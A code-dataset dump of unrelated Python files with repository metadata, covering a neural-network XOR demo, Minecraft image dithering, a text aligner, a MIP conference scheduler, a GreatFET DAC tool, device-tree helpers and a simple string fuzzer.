np.add(self.weights[i], lr*layer.T.dot(delta), out=self.weights[i], casting="unsafe")
return error
def predict(self, test_data):
prediction = np.array([]).reshape(0, self.arch[-1])
for data_points in test_data:
y = np.array([self.predict_single_data(data_points)])
prediction = np.vstack((prediction, y))
return prediction
def predict_single_data(self, x):
# concatenating one to make the dimension of the i/p vector equivalent to the dimension of weight vector
x = np.concatenate((np.ones(1).T, np.array(x)))
# forwarding the data to all the weights of the neuron
for each_weight in range(0, len(self.weights)):
x = sigmoid_functn(np.dot(x, self.weights[each_weight]))
x = np.concatenate((np.ones(1).T, np.array(x)))
return x[1]
def plot_hidden_layer_output(self, train_set, labels, title=None):
bias = np.array([self.weights[0][0]]).T
fired_op = neuron_operation(self.weights[0][1:], bias, train_set)
# bias = np.array([self.weights[0][0]])
# hidden_layer_out = np.dot(self.weights[0][1:], np.transpose(train_set)) + bias.T
# print(hidden_layer_out)
# fired_op = sigmoid_functn(hidden_layer_out)
# print(fired_op)
plt.scatter(fired_op[0,:], fired_op[1,:],c=np.reshape(labels,-1),alpha=1)
plt.xlabel("X axis")
plt.ylabel("Y axis")
plt.title(title)
plt.show()
def plot_decision_line(self, train_set, labels):
hidden_layer_op1 = neuron_operation(self.weights[0][1:], np.array([self.weights[0][0]]).T, train_set)
hidden_layer_op2 = neuron_operation(self.weights[1][1:].T, np.array([self.weights[1][0]]), hidden_layer_op1.T)
cx = self.weights[1][1]
cy = self.weights[1][2]
c = -self.weights[1][0]
plt.scatter(hidden_layer_op1[0,:], hidden_layer_op1[1,:], c=np.reshape(labels,-1),alpha=1)
plt.plot(([-1,2]),([(c/cy-cx*-1/cy).reshape(1,),(c/cy-cx*2/cy).reshape(1,)]),c='r',marker='x')
plt.xlabel("X axis")
plt.ylabel("Y axis")
plt.show()
def neuron_operation(weights, bias, train_set):
hidden_layer_out = np.dot(weights, np.transpose(train_set)) + bias
print(hidden_layer_out)
return sigmoid_functn(hidden_layer_out)
def decision_boundary_plot(X, y, nn, test_idx=None, resolution=0.02):
# Two decision boundary are required to separate the non-linear XOR data
# setup marker generator and color map
markers = ('s', 'x', 'o', '^', 'v')
colors = ('green', 'red', 'darkgreen', 'black', 'blue')
cmap = ListedColormap(colors[:len(np.unique(y))])
# plot the decision surface
x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1
x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1
xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),
np.arange(x2_min, x2_max, resolution))
Z = nn.predict(np.array([xx1.ravel(), xx2.ravel()]).T)
Z = Z.reshape(xx1.shape)
plt.contourf(xx1, xx2, Z, alpha=0.4, cmap=cmap)
plt.xlim(xx1.min(), xx1.max())
plt.ylim(xx2.min(), xx2.max())
# plot class samples
for idx, cl in enumerate(np.unique(y)):
plt.scatter(x=X[y == cl, 0], y=X[y == cl, 1],
alpha=0.8, c=cmap(idx),
marker=markers[idx], label=cl)
# highlight test samples
if test_idx:
# plot all samples
X_test, y_test = X[test_idx, :], y[test_idx]
plt.scatter(X_test[:, 0],
X_test[:, 1],
c='',
alpha=1.0,
linewidths=1,
marker='o',
s=55, label='test set')
# def plot_inp_out_weigthts(weights):
# from matplotlib.animation import FuncAnimation
# plt.style.use('seaborn-pastel')
# fig = plt.figure()
# ax = plt.axes(xlim=(0, 4), ylim=(-2, 2))
# line, = ax.plot([], [], lw=3)
if __name__ == '__main__':
seed(0)
# train_data = np.array([[0, 0], [0, 1],
# [1, 0], [1, 1]])
train_data = np.array([[-1, 1], [-1, -1],
[1, 1], [1, -1]])
l_rate = .001
epochs = 8000000
labels = np.array([1, -1, -1, 1])
# labels = np.array([0, 1,
# 1, 0])
xor = XORNeuralNetwork([2, 2, 1])
xor.fit_model(train_data, labels, l_rate, epochs)
decision_boundary_plot(train_data, labels, xor)
plt.xlabel('x-axis')
plt.ylabel('y-axis')
plt.legend(loc='upper left')
plt.tight_layout()
plt.show()
# print("Predictions..")
# for s in train_data:
# print(s, xor.predict_single_data(s))
| 40.533582 | 118 | 0.607199 | 1,571 | 10,863 | 4.078931 | 0.210694 | 0.042915 | 0.014981 | 0.013109 | 0.141542 | 0.099563 | 0.088015 | 0.053995 | 0.040886 | 0.009363 | 0 | 0.026408 | 0.260978 | 10,863 | 267 | 119 | 40.685393 | 0.771799 | 0.32201 | 0 | 0.094595 | 0 | 0 | 0.022832 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081081 | false | 0.013514 | 0.047297 | 0 | 0.182432 | 0.02027 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cf34e54df0106bc49c66a61fb987361ac4ea3e2 | 1,836 | py | Python | mcpipy/dither.py | wangtt03/raspberryjammod | d828d1b225c0dfc25d91f4e3569ce620fa231e14 | [
"MIT"
] | 338 | 2015-01-20T15:07:48.000Z | 2022-02-25T17:31:06.000Z | mcpipy/dither.py | wangtt03/raspberryjammod | d828d1b225c0dfc25d91f4e3569ce620fa231e14 | [
"MIT"
] | 58 | 2015-03-26T12:21:41.000Z | 2022-02-20T21:01:33.000Z | mcpipy/dither.py | wangtt03/raspberryjammod | d828d1b225c0dfc25d91f4e3569ce620fa231e14 | [
"MIT"
] | 112 | 2015-08-10T19:20:44.000Z | 2022-02-23T08:58:52.000Z | #
# Code by Alexander Pruss and under the MIT license
#
#
from mine import *
import colors
import sys
import os
from PIL import Image
from fonts import FONTS
import random
import text
mc = Minecraft()
pos = mc.player.getTilePos()
filename = sys.argv[1]
if not os.path.isfile(filename):
filename = os.path.dirname(os.path.realpath(sys.argv[0])) + "/" + filename
if len(sys.argv) > 2:
height = int(sys.argv[2])
else:
height = 140
image = Image.open(filename).convert('RGBA')
scale = height / float(image.size[1])
width = int(image.size[0] * scale)
def getPixel(z):
    # PIL's getpixel() expects integer coordinates, so truncate after scaling
    x = int(z[0] / scale)
    if x >= image.size[0]: x = image.size[0] - 1
    y = int(z[1] / scale)
    if y >= image.size[1]: y = image.size[1] - 1
    return image.getpixel((x,image.size[1]-1-y))
def clamp(x,a,b):
return min(b,max(x,a))
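# Each (DitheringMethod, label) pair below renders one copy of the same image:
# Floyd-Steinberg error diffusion versus random noise of varying amplitude and
# distribution, with the label drawn above each copy.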
dithers = [
(None, 'undithered'),
(colors.DitheringMethod(fs=True), 'Floyd-Steinberg'),
(colors.DitheringMethod(rng=lambda:random.uniform(-10,10)), 'uniform 10'),
(colors.DitheringMethod(rng=lambda:random.uniform(-20,20)), 'uniform 20'),
(colors.DitheringMethod(rng=lambda:random.uniform(-40,40)), 'uniform 40'),
(colors.DitheringMethod(rng=lambda:clamp(random.gauss(0,10),-30,30)), 'gaussian 10/30'),
(colors.DitheringMethod(rng=lambda:clamp(random.gauss(0,20),-30,30)), 'gaussian 20/30') ]
x0 = pos.x
for dither,name in dithers:
for (x,y,block) in colors.imageToBlocks(getPixel, width, height, dither=dither):
mc.setBlock(x+x0,y+pos.y,pos.z,block)
text.drawText(mc, FONTS['thin9pt'],
Vec3(x0,pos.y+height+1,pos.z),
Vec3(1,0,0), Vec3(0,1,0),
name, block.SEA_LANTERN, background=None)
x0 += width + 2
| 29.142857 | 94 | 0.604031 | 266 | 1,836 | 4.165414 | 0.338346 | 0.056859 | 0.108303 | 0.135379 | 0.201264 | 0.201264 | 0.084838 | 0.084838 | 0 | 0 | 0 | 0.053229 | 0.232571 | 1,836 | 63 | 95 | 29.142857 | 0.733144 | 0.026688 | 0 | 0 | 0 | 0 | 0.0552 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044444 | false | 0 | 0.177778 | 0.022222 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cf46c8a25376e29c092df80bf64c3ea9315de27 | 1,452 | py | Python | py/align.py | Eagleair/Eaglevlog | 9d4a02d76f07375564b5393da76250376e4d4de0 | [
"MIT"
] | null | null | null | py/align.py | Eagleair/Eaglevlog | 9d4a02d76f07375564b5393da76250376e4d4de0 | [
"MIT"
] | null | null | null | py/align.py | Eagleair/Eaglevlog | 9d4a02d76f07375564b5393da76250376e4d4de0 | [
"MIT"
] | null | null | null | #!/usr/local/bin/python3
# -*- coding: UTF-8 -*-
import re
import numpy as np
# Alignment function. str_many: a multi-line string whose rows share some
# identical columns. ts_conut: how many spaces one tab stands for. ints: how
# many tabs to prepend to the first column of the result.
def align(str_many,ts_conut,ints):
    line_list = []
    for line in str_many.splitlines(): # split each line into its whitespace-separated words
        line_list.append(re.findall(r'\S+', line))
a = np.array(line_list,dtype=object)
    col_same = np.where(np.all(a == a[0,...],axis=0)) # columns whose value is identical in every row
col_same = np.asarray(col_same,dtype=np.int8)
if a.shape[1]-1 in col_same:
a = np.insert(a,a.shape[1],'',axis=1)
for col in col_same[0]:
        a[...,col+1] = a[...,col] + ' ' + a[...,col+1] # merge each identical column into the one after it
a = np.delete(a,col_same,axis=1)
    str_len = np.char.str_len(np.asarray(a, dtype=str)) // ts_conut # tab widths each word already occupies (np.str was removed from NumPy)
a=np.asarray(a,dtype=[('strs','O'),('tab','O')])
    str_len = np.amax(str_len, axis=0) + 1 - str_len # how many tabs to append after each word so the columns line up
a['tab'] = str_len
a['strs'] = a['strs'] + a['tab']*'\t'
    a['strs'][...,-1] = np.vectorize(lambda s: s[:-1])(a['strs'][...,-1]) # strip the trailing '\t' from the last column
astr = a['strs']
tstr = ints * '\t'
astr = np.insert(astr,0,tstr,axis=1)
astr = np.insert(astr,astr.shape[1],'\n',axis=1)
astr = astr.reshape(-1)
astr = np.delete(astr,-1)
str_r = ''
str_r = ''.join(str(i) for i in astr)
return str_r
| 42.705882 | 99 | 0.5427 | 223 | 1,452 | 3.426009 | 0.336323 | 0.054974 | 0.031414 | 0.039267 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024954 | 0.254821 | 1,452 | 33 | 100 | 44 | 0.681146 | 0.128099 | 0 | 0 | 0 | 0 | 0.0358 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.066667 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cf65b5737b7175582cda39ca10875f5a95bc200 | 2,392 | py | Python | solve_with_mip_1.py | thesamovar/nmc_scheduling | ee003796fb32d8d523ac8a912ab06da6229e1240 | [
"MIT"
] | null | null | null | solve_with_mip_1.py | thesamovar/nmc_scheduling | ee003796fb32d8d523ac8a912ab06da6229e1240 | [
"MIT"
] | null | null | null | solve_with_mip_1.py | thesamovar/nmc_scheduling | ee003796fb32d8d523ac8a912ab06da6229e1240 | [
"MIT"
] | null | null | null | #%% Imports
import numpy as np
import pickle
import mip
#%% Load data
data = pickle.load(open('times_and_prefs_1k.pickle', 'rb'))
free_times = data['free_times']
prefs = data['prefs']
talk_clusters = data['talk_clusters']
talk_interestingness = data['talk_interestingness']
num_talks = data['num_talks']
num_times = data['num_times']
num_participants = len(prefs)
#%% Generate matrices
I = np.zeros((num_participants, num_talks), dtype=int)
A = np.zeros((num_participants, num_times), dtype=int)
F = np.zeros((num_talks, num_times), dtype=int)
for p, f in enumerate(free_times):
A[p, f] = 1
for t, f in enumerate(free_times[:num_talks]):
F[t, f] = 1
for p, interest in enumerate(prefs):
I[p, interest] = 1
#%% Run analysis
model = mip.Model()
# Add decision variables
S = [[model.add_var(f'S({t},{s})', var_type=mip.BINARY) for s in range(num_times)] for t in range(num_talks)]
V = [[[model.add_var(f'V({p},{t},{s})', var_type=mip.BINARY) for s in range(num_times)] for t in range(num_talks)] for p in range(num_participants)]
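# S[t][s] = 1 iff talk t is scheduled in slot s;
# V[p][t][s] = 1 iff participant p watches talk t in slot s.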
# Add constraints
# only assign a talk to one slot
for t in range(num_talks):
    model += mip.xsum(S[t][s] for s in range(num_times)) <= 1  #, f"talk_to_slot({t})"
# only assign talks to free slots
for s in range(num_times):
for t in range(num_talks):
model += S[t][s]<=F[t, s]
# viewers only watch talks in given slots if they're available and interested
for p in range(num_participants):
for t in range(num_talks):
for s in range(num_times):
model += V[p][t][s] <= S[t][s]
model += V[p][t][s] <= A[p, s]
model += V[p][t][s] <= I[p, t]
# can only watch at most one talk per slot
for p in range(num_participants):
for s in range(num_times):
model += mip.xsum(V[p][t][s] for t in range(num_talks))<=1
# Add objective
model.objective = mip.maximize(mip.xsum(V[p][t][s] for p in range(num_participants) for t in range(num_talks) for s in range(num_times)))
#%% Solve it
model.optimize()
#%% Show the solution
print(f'Number of watch hours is {model.objective_value}')
for t in range(num_talks):
    for s in range(num_times):
        if S[t][s].x:
            break
    else:
        continue  # this talk was not scheduled in any slot
    print(f'Assign talk {t} to slot {s}')
can_watch = []
for p in range(num_participants):
if V[p][t][s].x:
can_watch.append(p)
print(f' Participants that can watch: {can_watch}') | 33.690141 | 148 | 0.656773 | 426 | 2,392 | 3.561033 | 0.206573 | 0.096902 | 0.138431 | 0.058009 | 0.413975 | 0.350692 | 0.282136 | 0.208306 | 0.208306 | 0.208306 | 0 | 0.003093 | 0.188963 | 2,392 | 71 | 149 | 33.690141 | 0.778866 | 0.143395 | 0 | 0.22 | 0 | 0 | 0.115422 | 0.023576 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.06 | 0 | 0.06 | 0.06 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cfb7fe67f51c09c752c76cb4d875796fa9edaf6 | 1,437 | py | Python | host/greatfet/commands/greatfet_dac.py | grvvy/greatfet | e8098307960a60e34c27ed2903f7abc2252b4cce | [
"BSD-3-Clause"
] | 328 | 2015-08-30T03:10:50.000Z | 2022-03-31T12:47:48.000Z | host/greatfet/commands/greatfet_dac.py | grvvy/greatfet | e8098307960a60e34c27ed2903f7abc2252b4cce | [
"BSD-3-Clause"
] | 231 | 2017-02-11T23:21:31.000Z | 2022-03-27T23:07:43.000Z | host/greatfet/commands/greatfet_dac.py | grvvy/greatfet | e8098307960a60e34c27ed2903f7abc2252b4cce | [
"BSD-3-Clause"
] | 94 | 2015-09-27T15:01:04.000Z | 2022-02-26T15:41:20.000Z | #!/usr/bin/env python3
#
# This file is part of GreatFET
from __future__ import print_function
import errno
import sys
import greatfet
from greatfet import GreatFET
from greatfet.utils import log_silent, log_verbose
def main():
    from greatfet.utils import GreatFETArgumentParser

    # Set up a simple argument parser.
    parser = GreatFETArgumentParser(description="Utility for experimenting with GreatFET's DAC", verbose_by_default=True)
    parser.add_argument('-f', '--format', dest='format', type=str, default='voltage',
                        choices=['voltage', 'raw'],
                        help="Format for the input.\nVoltage string, or binary value to be loaded into the DAC.")
    parser.add_argument('value', metavar='[value]', type=float,
                        help="The desired voltage (default) or raw value to load into DAC (with -f raw).")

    args = parser.parse_args()
    log_function = parser.get_log_function()
    device = parser.find_specified_device()

    device.apis.dac.initialize()

    if args.format == "voltage":
        # Voltage must be passed to the device in millivolts, so * 1000.
        device.apis.dac.set_voltage(int(args.value * 1000))
        log_function("DAC set to {} volts".format(args.value))
    else:
        device.apis.dac.set_value(int(args.value))
        log_function("DAC set to {}".format(int(args.value)))
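# Example invocations (assuming a GreatFET board is attached):
#   greatfet_dac.py 1.8           # drive the DAC output to 1.8 V
#   greatfet_dac.py -f raw 512    # load the raw value 512 into the DAC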
if __name__ == '__main__':
    main()
| 31.23913 | 121 | 0.664579 | 187 | 1,437 | 4.951872 | 0.449198 | 0.047516 | 0.042117 | 0.056156 | 0.041037 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008079 | 0.224774 | 1,437 | 45 | 122 | 31.933333 | 0.82316 | 0.102296 | 0 | 0 | 0 | 0 | 0.227237 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.269231 | 0 | 0.307692 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cfbf92d7ba10604d7c4e6ca34af19ffe9d135ca | 7,668 | py | Python | assists/lopper_lib.py | nagasureshkumar/lopper | 8c5f34181a246cdd8ed8ed4ba6e32de017940af8 | [
"BSD-3-Clause"
] | null | null | null | assists/lopper_lib.py | nagasureshkumar/lopper | 8c5f34181a246cdd8ed8ed4ba6e32de017940af8 | [
"BSD-3-Clause"
] | null | null | null | assists/lopper_lib.py | nagasureshkumar/lopper | 8c5f34181a246cdd8ed8ed4ba6e32de017940af8 | [
"BSD-3-Clause"
] | null | null | null | #/*
# * Copyright (c) 2020 Xilinx Inc. All rights reserved.
# *
# * Author:
# * Bruce Ashfield <bruce.ashfield@xilinx.com>
# *
# * SPDX-License-Identifier: BSD-3-Clause
# */
import struct
import sys
import types
import unittest
import os
import getopt
import re
import subprocess
import shutil
import ast
from pathlib import Path
from pathlib import PurePath
from io import StringIO
import contextlib
import importlib
from lopper import Lopper
from lopper import LopperFmt
from lopper_tree import LopperAction
from lopper_tree import LopperProp
from lopper_tree import LopperNode
from lopper_tree import LopperTree
from lopper_yaml import LopperYAML
import lopper
import json
from itertools import chain
# tests for a bit that is set, going from 31 -> 0, from MSB to LSB
def check_bit_set(n, k):
    if n & (1 << (k)):
        return True
    return False
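# e.g. check_bit_set(0b0100, 2) -> True, check_bit_set(0b0100, 1) -> False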
def set_bit(value, bit):
    return value | (1 << bit)

def clear_bit(value, bit):
    return value & ~(1 << bit)
def chunks(l, n):
    # For item i in a range that is a length of l,
    for i in range(0, len(l), n):
        # Create an index range for l of n items:
        yield l[i:i+n]
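# e.g. list(chunks([1, 2, 3, 4, 5, 6], 3)) -> [[1, 2, 3], [4, 5, 6]]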
def json_expand( node ):
    debug = False

    if debug:
        print( "[DBG]: ========> json expanding node: %s" % node.name )

    for p in node:
        if p.pclass == 'json':
            # save the original json, we may need it again
            p.value_json = p.value

            # this converts it to a list, but that's causing some
            # issues with assumptions in the various _expand routines, so
            # not doing this for now.
            # p.value = p.value

            phandle_index,field_count = p.phandle_params()

            if debug:
                print( '   -- json property: [%s] %s [%s]' % ([p],p.name,p.value) )
                print( '      phandle info: %s %s' % (phandle_index,field_count) )

            loaded_j = json.loads( p.value_json )
            p.struct_value = loaded_j
            p.list_value = []
            if field_count:
                for j in loaded_j:
                    if type(j) == list:
                        p.list_value = p.list_value + j
                    elif type(j) == dict:
                        vals = list(j.values())
                        p.list_value = p.list_value + vals
                    else:
                        p.list_value.append(j)

            # dump the json elements
            if debug:
                print( "    [%s] %s" % (type(loaded_j),loaded_j) )
                for j in loaded_j:
                    if type(j) == list:
                        for jj in j:
                            print( "       json list element: %s" % jj )
                    elif type(j) == dict:
                        for jj,kk in j.items():
                            print( "      json dict element: key: %s: value: %s" % (jj,kk) )
                            if type(kk) == dict:
                                print( "          nested dict" )
                    else:
                        print( "      non-list: %s" % j )
def property_set( property_name, property_val, node, fdt=None ):
    newprop = LopperProp( property_name, -1, None, property_val )
    node += newprop
    if fdt:
        node.sync( fdt )
def node_ancestors_of_type( node, ctype ):
    ret_nodes = []

    p = node.parent
    while p:
        nt = p.type
        if re.search( "reserved-memory", p.name ):
            nt = [ "reserved-memory" ]

        if ctype in nt:
            ret_nodes.append( p )

        p = p.parent

    return ret_nodes
def node_ancestor_types( node ):
    # The return list from this can be tested as such:
    #     simple_bus = "simple-bus" in chain(*node_types)
    # to get a boolean result
    #
    ret_types = [ node.type ]

    p = node.parent
    while p:
        nt = p.type
        if re.search( "reserved-memory", p.name ):
            nt = [ "reserved-memory" ]

        if nt:
            ret_types.append( nt )

        p = p.parent

    return ret_types
def includes( tree, include_prop ):
    include_nodes = []

    if include_prop:
        includes = include_prop.value
        # every other entry is a phandle
        for ph in includes[::2]:
            anode = tree.pnode( ph )
            if anode:
                include_nodes.append( anode )

    return include_nodes
def node_accesses( tree, node ):
    try:
        access_list = node["access"].value
    except:
        access_list = []

    accessed_nodes = []
    if access_list:
        # although the access list is decoded as a list, it is actually tuples, so we need
        # to get every other entry as a phandle, not every one.
        for ph in access_list[::2]:
            anode = tree.pnode( ph )
            if anode:
                # print( "node access found: %s" % anode.abs_path )
                accessed_nodes.append( anode )

    return accessed_nodes
# returns True if a node is compatible with the passed string
# (or list of strings)
def is_compat( node, compat_string ):
    try:
        node_compat = node['compatible'].value
    except:
        return None

    if type(compat_string) == list:
        x = []
        for c in compat_string:
            if not x:
                x = [item for item in node_compat if c in item]
    else:
        x = [item for item in node_compat if compat_string in item]

    return x != []
# process cpus, and update their references appropriately
def cpu_refs( tree, cpu_prop, verbose = 0 ):
    refd_cpus = []

    if not cpu_prop:
        return refd_cpus, refd_cpus

    if verbose:
        print( "[DBG]: lopper_lib: cpu_refs: processing %s" % cpu_prop )

    cpu_prop_list = list( chunks(cpu_prop.value,3) )
    sub_cpus_all = []

    # loop through the nodes, we want to refcount the sub-cpu nodes
    # and their parents, we'll delete anything that isn't used later.
    for cpu_phandle, mask, mode in cpu_prop_list:
        cpu_mask = mask
        if verbose:
            print( "[INFO]: cb cpu mask: %s" % hex(cpu_mask))

        try:
            cpu_node = tree.pnode(cpu_phandle)
        except:
            # couldn't find the node, skip
            continue

        sub_cpus = tree.subnodes( cpu_node, "cpu@.*" )
        sub_cpus_all = sub_cpus + sub_cpus_all

        if verbose:
            print( "[INFO]: lopper_lib: cpu prop phandle: %s" % cpu_phandle )
            print( "[INFO]: lopper_lib: cpu node: %s" % cpu_node )
            print( "[INFO]: lopper_lib: sub cpus: %s" % sub_cpus )

        # we'll now walk from 0 -> 31. Checking the mask to see if access is
        # allowed. If it is allowed, we'll check to see if there's a sub-cpu at
        # the same offset. If so, we refcount it AND the parent. For sub-cpus
        # that are available, but have no access, we log them to be deleted later
        # (we don't delete them now, since it would shift node numbers).
        for idx in range( 0, 32 ):
            if check_bit_set( cpu_mask, idx ):
                try:
                    sub_cpu_node = sub_cpus[idx]
                    # refcount it AND the parent
                    tree.ref_all( sub_cpu_node, True )
                    refd_cpus.append( sub_cpu_node )
                except:
                    pass

    unrefd_cpus = []
    for s in sub_cpus_all:
        if s not in refd_cpus:
            try:
                unrefd_cpus.append( s )
            except Exception as e:
                print( "[WARNING]: %s" % e )

    # you can globally check for ref'd cpus after calling this routine
    # via:
    #    ref_nodes = tree.refd( "/cpus.*/cpu.*" )
    return refd_cpus, unrefd_cpus
| 29.606178 | 93 | 0.551643 | 1,030 | 7,668 | 3.983495 | 0.261165 | 0.017061 | 0.012186 | 0.019498 | 0.114063 | 0.084816 | 0.084816 | 0.073117 | 0.046308 | 0.034609 | 0 | 0.004675 | 0.358372 | 7,668 | 258 | 94 | 29.72093 | 0.829268 | 0.21505 | 0 | 0.233918 | 0 | 0 | 0.083793 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.070175 | false | 0.005848 | 0.146199 | 0.011696 | 0.28655 | 0.081871 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
fa00467dbd578d27792ea26c026206d93da1db4d | 4,325 | py | Python | src/pyfuzz/fuzzers.py | fabriceyhc/pyfuzz | 67f8bd844f63139ca8f795b2bc6e30a419fa037e | [
"MIT"
] | null | null | null | src/pyfuzz/fuzzers.py | fabriceyhc/pyfuzz | 67f8bd844f63139ca8f795b2bc6e30a419fa037e | [
"MIT"
] | null | null | null | src/pyfuzz/fuzzers.py | fabriceyhc/pyfuzz | 67f8bd844f63139ca8f795b2bc6e30a419fa037e | [
"MIT"
] | null | null | null | import random
from pyfuzz.runners import *
class Fuzzer(object):
    def __init__(self):
        pass

    def fuzz(self):
        """Return fuzz input"""
        return ""

    def run(self, runner=Runner()):
        """Run `runner` with fuzz input"""
        return runner.run(self.fuzz())

    def runs(self, runner=PrintRunner(), trials=10):
        """Run `runner` with fuzz input, `trials` times"""
        # Note: the list comprehension below does not invoke self.run() for subclasses
        # return [self.run(runner) for i in range(trials)]
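        # Note: self.inp and self.failure_cases are only defined by subclasses
        # such as MutationFuzzer; the base Fuzzer never sets them itself.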
        outcomes = []
        for i in range(trials):
            outcome = self.run(runner)
            if outcome[1] == runner.FAIL:
                self.failure_cases.append(self.inp)
            outcomes.append(outcome)
        return outcomes

class RandomFuzzer(Fuzzer):
    def __init__(self,
                 min_length=10,
                 max_length=100,
                 char_start=32,
                 char_range=32):
        """Produce strings of `min_length` to `max_length` characters
        in the range [`char_start`, `char_start` + `char_range`]"""
        self.min_length = min_length
        self.max_length = max_length
        self.char_start = char_start
        self.char_range = char_range

    def fuzz(self):
        string_length = random.randrange(self.min_length, self.max_length + 1)
        out = ""
        for i in range(0, string_length):
            out += chr(random.randrange(self.char_start,
                                        self.char_start + self.char_range))
        return out

class MutationFuzzer(Fuzzer):
    def __init__(self, seed, min_mutations=2, max_mutations=10, mutator=lambda x: x):
        self.seed = seed
        self.min_mutations = min_mutations
        self.max_mutations = max_mutations
        self.mutator = mutator
        self.reset()

    def reset(self):
        self.failure_cases = []
        self.population = self.seed
        self.seed_index = 0

    def mutate(self, inp):
        return self.mutator(inp)

    def create_candidate(self):
        candidate = random.choice(self.population)
        iters = random.randint(self.min_mutations, self.max_mutations)
        for i in range(iters):
            candidate = self.mutate(candidate)
        return candidate

    def fuzz(self):
        if self.seed_index < len(self.seed):
            # Still seeding
            self.inp = self.seed[self.seed_index]
            self.seed_index += 1
        else:
            # Mutating
            self.inp = self.create_candidate()
        return self.inp

class MutationCoverageFuzzer(MutationFuzzer):
    def reset(self):
        super().reset()
        self.coverages_seen = set()
        # Now empty; we fill this with seed in the first fuzz runs
        self.population = []

    def run(self, runner):
        """Run function(inp) while tracking coverage.
        If we reach new coverage,
        add inp to population and its coverage to population_coverage
        """
        result, outcome = super().run(runner)
        new_coverage = frozenset(runner.coverage())
        if outcome == Runner.PASS and new_coverage not in self.coverages_seen:
            # We have new coverage
            self.population.append(self.inp)
            self.coverages_seen.add(new_coverage)
        return result

if __name__ == '__main__':
    print("== RandomFuzzer " + "=" * 50)
    random_fuzzer = RandomFuzzer(min_length=20, max_length=20)
    for i in range(10):
        print(random_fuzzer.fuzz())

    print("== MutationLineCoverageFuzzer " + "=" * 50)
    from pyfuzz.test_programs import cgi_decode
    from pyfuzz.string_mutations import mutate_strings
    from pyfuzz.byte_mutations import mutate_bytes
    from pyfuzz.runners import *

    seed = ["Hello World"]
    cgi_runner = FunctionLineCoverageRunner(cgi_decode)
    m = MutationCoverageFuzzer(seed, mutator=mutate_strings)
    results = m.runs(cgi_runner, 10000)
    print(m.population)
    print(cgi_runner.coverage())

    print("== MutationBranchCoverageFuzzer " + "=" * 50)
    seed = ["Hello World"]
    cgi_runner = FunctionBranchCoverageRunner(cgi_decode)
    m = MutationCoverageFuzzer(seed, mutator=mutate_strings)
    results = m.runs(cgi_runner, 10)
    print(m.population)
    print(cgi_runner.coverage()) | 32.276119 | 86 | 0.617341 | 507 | 4,325 | 5.094675 | 0.250493 | 0.027875 | 0.011614 | 0.021293 | 0.215641 | 0.089044 | 0.089044 | 0.059621 | 0.059621 | 0.059621 | 0 | 0.012242 | 0.282312 | 4,325 | 134 | 87 | 32.276119 | 0.81991 | 0.130867 | 0 | 0.157895 | 0 | 0 | 0.030106 | 0.014646 | 0 | 0 | 0 | 0 | 0 | 1 | 0.136842 | false | 0.021053 | 0.063158 | 0.010526 | 0.326316 | 0.084211 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
fa0678f5b57ca66a4b64174af45a0a45f7a432a4 | 4,332 | py | Python | sdk/cosmos/azure-cosmos/azure/cosmos/_routing/routing_range.py | jiasli/azure-sdk-for-python | f700299c45cea44064d5156f2bfe3664284f6da4 | [
"MIT"
] | null | null | null | sdk/cosmos/azure-cosmos/azure/cosmos/_routing/routing_range.py | jiasli/azure-sdk-for-python | f700299c45cea44064d5156f2bfe3664284f6da4 | [
"MIT"
] | null | null | null | sdk/cosmos/azure-cosmos/azure/cosmos/_routing/routing_range.py | jiasli/azure-sdk-for-python | f700299c45cea44064d5156f2bfe3664284f6da4 | [
"MIT"
] | null | null | null | #The MIT License (MIT)
#Copyright (c) 2014 Microsoft Corporation
